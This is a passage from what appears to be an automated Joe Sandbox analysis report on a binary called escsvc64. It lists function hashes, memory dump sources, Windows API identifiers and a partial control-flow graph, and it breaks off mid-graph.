            • Opcode Fuzzy Hash: daf108ad2492d59e3b2f479c2d6f66dd4c153266607f82eb38b2f9320bf23656
            • Instruction Fuzzy Hash: FD51F872704B85C7EB41DF6AE48039AB7A4F788B84F544016EB8A87B78DF3AC404CB00
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminateValue
            • String ID:
            • API String ID: 2638224479-0
            • Opcode ID: fe3b404e39ab3a6359d64812ae7d5c32bbc6d9cca1fe9c7ac87858ea7d466bcd
            • Instruction ID: a5a9b1898e11e2f70964af4ed3ba5651a8fd56e4f95061c9445462abb668a243
            • Opcode Fuzzy Hash: fe3b404e39ab3a6359d64812ae7d5c32bbc6d9cca1fe9c7ac87858ea7d466bcd
            • Instruction Fuzzy Hash: C1214A71208B8096EB61DB52F84439AB3A4F79DBC4F844025FB8A47B69DF7DC504CB00
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 1269745586-0
            • Opcode ID: 749ad101a7401e2ef89ee7f69644ff702e9b097609237a3113f26607bece523b
            • Instruction ID: 547e43dbe8d46964c1980a3d338b47eb6a37bf82025ef3a4bc6307ca307c5f97
            • Opcode Fuzzy Hash: 749ad101a7401e2ef89ee7f69644ff702e9b097609237a3113f26607bece523b
            • Instruction Fuzzy Hash: 18010C71318A8196EB62DB62F88439A73A4FB9D785F400125BBCE47675EF7DC108CB14
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
            • String ID:
            • API String ID: 1445889803-0
            • Opcode ID: 3172a890c2690bad93ebacd8f31485773cebedccae4a3836e7c267b263b6fc39
            • Instruction ID: c8f5c1707d9d7f31180c01c804354bd43dcd32a39dbeb025c98923512ad50797
            • Opcode Fuzzy Hash: 3172a890c2690bad93ebacd8f31485773cebedccae4a3836e7c267b263b6fc39
            • Instruction Fuzzy Hash: 51015B31255A4086EB929F22F9443856360F74DBD1F846220FF9E4B7B4DA7DC8858700
            APIs
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 004517B1
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00451AD4
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00451ADA
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 3668304517-0
            • Opcode ID: 271df34881ef90a6752aab6aa872fdf107a8abbdb8059afa06a903151e2ecbe1
            • Instruction ID: d723985b6ed305354a95720fc10d28f095bdaecea1c04615a6b53f9ad632607c
            • Opcode Fuzzy Hash: 271df34881ef90a6752aab6aa872fdf107a8abbdb8059afa06a903151e2ecbe1
            • Instruction Fuzzy Hash: AA02CE30618A088FDB14EF28D8997AE77E1FB98315F14461EE84BC32A1DF78D945CB85
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 3668304517-0
            • Opcode ID: 3294e3db836000f6d2449f15fb682ad65810c8515660842441d03c4222b8b57f
            • Instruction ID: 3e174ebd0b4dc535322bba8940045b5d3b3c6cc8a60d76115f1a3040dc0f23b8
            • Opcode Fuzzy Hash: 3294e3db836000f6d2449f15fb682ad65810c8515660842441d03c4222b8b57f
            • Instruction Fuzzy Hash: 0E027230618A0C8FEB95EF28D8897EE77E1FB9C355F108619F44AC31A1DF749A458B81
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$CaptureContext
            • String ID:
            • API String ID: 2202868296-0
            • Opcode ID: 2bd1da81d756f9debfc8ace423c26fb13e72461904f7d13b3772817e52c697b7
            • Instruction ID: f8d1cc87438c59eaa9310dd9af8894f5bfa89bfe72cd1caa951d1f775a9d3454
            • Opcode Fuzzy Hash: 2bd1da81d756f9debfc8ace423c26fb13e72461904f7d13b3772817e52c697b7
            • Instruction Fuzzy Hash: CC015A71219AC492F766DB26F4557EA63A0EB8D384F000129BB8E076F6DF3DC508CB01
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: CodeInfoPageValid
            • String ID:
            • API String ID: 546120528-0
            • Opcode ID: 746918d43814e1f2c9af94b4a9972c42ccf04353f898198fd0c53df7ebd173c8
            • Instruction ID: 18e61400bb96301bbec93746a76fb9060afdb4b0dd8a3b5c59150d0e33468df6
            • Opcode Fuzzy Hash: 746918d43814e1f2c9af94b4a9972c42ccf04353f898198fd0c53df7ebd173c8
            • Instruction Fuzzy Hash: 33A12BF3A0478086E756EF36E4143BE7BA1F70AB8AF98801AE7454B3A5DB39C544D710
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ByteCharErrorLastMultiWide
            • String ID:
            • API String ID: 203985260-0
            • Opcode ID: b65bf8a35cb6acb9d5dcae940683951546b7911799428669d5f49dfc0d45bba3
            • Instruction ID: 4df4f4bd984c48344e5120aa612abb9bb394b705a9150be4478bdb323d17f3df
            • Opcode Fuzzy Hash: b65bf8a35cb6acb9d5dcae940683951546b7911799428669d5f49dfc0d45bba3
            • Instruction Fuzzy Hash: D271C0B2605A8186F7A7EF16F5117EA73A0F7897D4F148126FF890B7A5DB388441C720
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5f8b9bd707a4bded7346095c377bb72f702d82cdc3ba41d96247cdce7536106d
            • Instruction ID: a108be8453ac259458a964569c12a7956ece8339cf63da49095956afe38e5b46
            • Opcode Fuzzy Hash: 5f8b9bd707a4bded7346095c377bb72f702d82cdc3ba41d96247cdce7536106d
            • Instruction Fuzzy Hash: 6A31BDB261069042F727EF37B9957DF7691ABC97E0F254628BB26076F2CB78C4008714
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3916222277
            • Opcode ID: 32495c8dccd9f3046cba6630eed02d8ddada8e30325001f32572ff2cb2464c48
            • Instruction ID: 9b98e272f23b31000e522342938d738987bd4303e8b55c05a30ad8263886681a
            • Opcode Fuzzy Hash: 32495c8dccd9f3046cba6630eed02d8ddada8e30325001f32572ff2cb2464c48
            • Instruction Fuzzy Hash: 1CD103F290878486F762DF16B5043AE7AA0F74A7D4F204115FF95076EAEB7AC840DB48
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: 9c474ab35380cca253cccae0723cdccddec738a87e399c508cee6c96ab130aff
            • Instruction ID: 6361ff8ef294167b234341539ef2ad75469b6cb2daf03c0979b493034d4b5b00
            • Opcode Fuzzy Hash: 9c474ab35380cca253cccae0723cdccddec738a87e399c508cee6c96ab130aff
            • Instruction Fuzzy Hash: A1F0FEB161858081FA62EB22E8623DA7791A79C7D9FC00615FB9D5B6B5DA7CC2058A00
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: 81c1d04c05283fd2a1325daf2c7e4ba4b4c701fcda75abe4fb00a0c260c9d664
            • Instruction ID: 203bb844dbd7e1f4b5331dfdd11ea529bf7a11c02d688668fadee304e6c52705
            • Opcode Fuzzy Hash: 81c1d04c05283fd2a1325daf2c7e4ba4b4c701fcda75abe4fb00a0c260c9d664
            • Instruction Fuzzy Hash: 46B1CFF360878486F766CE17B6043AE7AE1E75A7D4F240115EF4923AFAD779C8408B48
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: cc105c1c9ce3bac7ae62e62a748aff5b23afc70919c97d87a9511dca8811ff66
            • Instruction ID: 94e25bba52440a2cca7ea8ee516e65074c5b4943095f1fee069ad109c40d3143
            • Opcode Fuzzy Hash: cc105c1c9ce3bac7ae62e62a748aff5b23afc70919c97d87a9511dca8811ff66
            • Instruction Fuzzy Hash: 3AB1BEF260878486FB62CF16B5443AA6BE0F7897D4F140115FF4A13AFADB79C9448B44
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: 97eedac39f7bfedb38e4d82418d8d0a5aad94e2e9198739ae9b92dec815e7bfd
            • Instruction ID: 64f448d262f21ed941de6c020a9d0f3a60cb7ec8839f9869103a210ec6ba61c5
            • Opcode Fuzzy Hash: 97eedac39f7bfedb38e4d82418d8d0a5aad94e2e9198739ae9b92dec815e7bfd
            • Instruction Fuzzy Hash: A89100F2A0878446FB62CE16B5043EA6AE0F7597D4F180115FF49176F6EB79C880CB48
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: 38ad8a242f868f7af08282b4cbf198ccb50b62c679b78f933d7899405d201d8c
            • Instruction ID: 4da5bba44bb66270887b95eda529c48334dd4f935bc46f25b0db5c7bb74f89e1
            • Opcode Fuzzy Hash: 38ad8a242f868f7af08282b4cbf198ccb50b62c679b78f933d7899405d201d8c
            • Instruction Fuzzy Hash: 3E8101F260878486FB62CE16B5043AA7AE0F7497D8F140115FF4A17AF6DB79C840CB48
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID: -
            • API String ID: 0-2547889144
            • Opcode ID: 20d9e0a11a594cb2d75081cad8ba9c6f5020e3f73ed6864717b6a692171ac5b5
            • Instruction ID: be0ece8c6c099251b535272f2d67437119a85b849efd07fc89c03c42969d6caf
            • Opcode Fuzzy Hash: 20d9e0a11a594cb2d75081cad8ba9c6f5020e3f73ed6864717b6a692171ac5b5
            • Instruction Fuzzy Hash: AB81BEF250878486FB62CF16B1043AA7AE0F75A788F144115FF8913AF6DB79C944CB49
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c6c0af3afa3ce2cd943dfd938cfb517e3e80b3f38b163d67ad5b76e19be9c73d
            • Instruction ID: 44648f02c182beadb8b036353e2636875c16a05d5d4ef3af2416be37cd8575da
            • Opcode Fuzzy Hash: c6c0af3afa3ce2cd943dfd938cfb517e3e80b3f38b163d67ad5b76e19be9c73d
            • Instruction Fuzzy Hash: D5B15D3061CB5C4FDB29DB6888495BE77D1FB45712F54035FE886C3293DA289C4A878B
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ac996540c99712a2732c3a0cd771fdd5b82a7297ebbc67a68a116eb0094e006c
            • Instruction ID: 70d3a97b670b747bf5a6e9085d796e33e0a35ce39c655d07e696b19d8a097a4a
            • Opcode Fuzzy Hash: ac996540c99712a2732c3a0cd771fdd5b82a7297ebbc67a68a116eb0094e006c
            • Instruction Fuzzy Hash: 07B15030A18B488FEB54DF68D8946AE77F1FB98305F10422EE84AD3261DF74D985CB45
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e3c3617ae956e6184eb8065b69f6db008006156971f66254c3dd82276b5a9f0f
            • Instruction ID: 677c0758eb96fa0f58adb50d014ce7746cb49a23bd9658e5ec2e981993f68fea
            • Opcode Fuzzy Hash: e3c3617ae956e6184eb8065b69f6db008006156971f66254c3dd82276b5a9f0f
            • Instruction Fuzzy Hash: 24B12D30A18A4C8FEB95DF68D8847EDB7F1FB98345F10822EE44AD3151DF749A858B41
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09105ba1de81c0eabae60244af1f5e217578faf070f434ce134c4c62d05422bb
            • Instruction ID: cb9468e5dd3d17a1f1a5f45de5d21e32605364da385cad08a5688e468ff26665
            • Opcode Fuzzy Hash: 09105ba1de81c0eabae60244af1f5e217578faf070f434ce134c4c62d05422bb
            • Instruction Fuzzy Hash: 9C31DEB670475042FB27DA67B4117EBA19ABB9C7E8F284125BF5907BE6DE38C8118700
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e0ffe5f4428bf9eeef88d2c30132eb356a74c290e10bf32207ccb9b55cee9dc4
            • Instruction ID: 55cee6301af4064af0a7b8dd5ff135198a46271af006edfdb84eb076825c30f3
            • Opcode Fuzzy Hash: e0ffe5f4428bf9eeef88d2c30132eb356a74c290e10bf32207ccb9b55cee9dc4
            • Instruction Fuzzy Hash: 31318DB222465046F367EF37B942B9EAA51A7C87E0F114615BF2A476F7CB7888018B14
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0259813f3e940429c9912dbf36fea80308d35746dd903408b396d40507f961b0
            • Instruction ID: 0e9b1d565009756a5861b1773b79cbb7b290ff6b7f3b08d1189dcf1d4d27c9f8
            • Opcode Fuzzy Hash: 0259813f3e940429c9912dbf36fea80308d35746dd903408b396d40507f961b0
            • Instruction Fuzzy Hash: EF319EB221164046F766AF37BA42B9E6A51A7987F0F215716BF79077F3CB3884018718
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 45ba4ea63d73a6e75ec1ab626a6aaa22a6c04ea535b2695e22b789f8ff2ae24a
            • Instruction ID: ca43f0d881ef68448f7dc613d54f2faea86250d2d978d8cd49a0b55ef0f1022f
            • Opcode Fuzzy Hash: 45ba4ea63d73a6e75ec1ab626a6aaa22a6c04ea535b2695e22b789f8ff2ae24a
            • Instruction Fuzzy Hash: 5331F8B261024086F317EF77B9917EE7551A7883E0F258629BB2607AF7CF3884009714

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 601 1400027d0-140002854 SysAllocString * 3 603 140002a69-140002a8e SysFreeString * 3 601->603 604 14000285a-14000286a 601->604 607 140002a91 call 140002be0 603->607 605 140002a56-140002a61 604->605 606 140002870-14000287f 604->606 605->603 608 140002880-14000289f 606->608 609 140002a96-140002aa5 607->609 612 1400028a5-1400028b9 608->612 613 1400029d9-140002a36 608->613 616 1400029ca-1400029d7 612->616 617 1400028bf-1400028ce 612->617 621 140002a38-140002a48 613->621 616->613 616->621 617->616 622 1400028d4-1400028d6 617->622 621->608 623 140002a4e 621->623 622->616 624 1400028dc-1400028df 622->624 623->605 625 1400028e0-1400028e2 624->625 626 1400029c5 625->626 627 1400028e8-140002906 625->627 626->616 627->626 629 14000290c-140002942 lstrlenW lstrcpynW lstrcmpW 627->629 630 140002944-140002957 lstrcmpW 629->630 631 140002988-1400029c0 SysFreeString * 4 629->631 630->631 632 140002959-14000296c lstrcmpW 630->632 631->625 632->631 633 14000296e-140002984 lstrcmpW 632->633 633->631
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: String$Free$lstrcmp$Alloc$lstrcpynlstrlen
            • String ID:
            • API String ID: 1252115942-0
            • Opcode ID: 03eb1b18c4707c08c21059389df7a0a4c71f297fbe5ad549f874feaa8339716f
            • Instruction ID: 10d5fb0b984341c209e7259ff63cebb7c5da4f613dd4f39bc1d8205302deed1f
            • Opcode Fuzzy Hash: 03eb1b18c4707c08c21059389df7a0a4c71f297fbe5ad549f874feaa8339716f
            • Instruction Fuzzy Hash: 5D711476204B8586EB61DF26E84439AB7A4F789FD4F554022EF8E87B28DF39C449C700

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 697 140006bb0-140006bd0 698 140006bd2-140006bde GetEnvironmentStringsW 697->698 699 140006c0c-140006c0f 697->699 702 140006bec-140006bf5 GetLastError 698->702 703 140006be0-140006bea 698->703 700 140006c11-140006c1d GetEnvironmentStringsW 699->700 701 140006c80-140006c83 699->701 704 140006c5a-140006c5c 700->704 705 140006c1f-140006c25 700->705 706 140006c85-140006c87 701->706 707 140006c89-140006c95 GetEnvironmentStrings 701->707 708 140006c06 702->708 709 140006bf7-140006c01 702->709 703->705 712 140006d7b-140006d8d 704->712 710 140006c27-140006c2e 705->710 711 140006c39-140006c41 705->711 706->704 706->707 707->704 713 140006c97-140006c9d 707->713 708->699 709->707 710->710 716 140006c30-140006c37 710->716 717 140006c44 call 1400089d0 711->717 714 140006cd8-140006ce0 713->714 715 140006c9f 713->715 719 140006ce3 call 140008a40 714->719 718 140006ca0-140006cbf MultiByteToWideChar 715->718 716->710 716->711 720 140006c49-140006c4f 717->720 718->704 721 140006cc1-140006cd6 718->721 722 140006ce8-140006cee 719->722 723 140006c61-140006c7b call 14000ae10 FreeEnvironmentStringsW 720->723 724 140006c51-140006c54 FreeEnvironmentStringsW 720->724 721->714 721->718 725 140006cfd-140006d0b 722->725 726 140006cf0-140006cfb 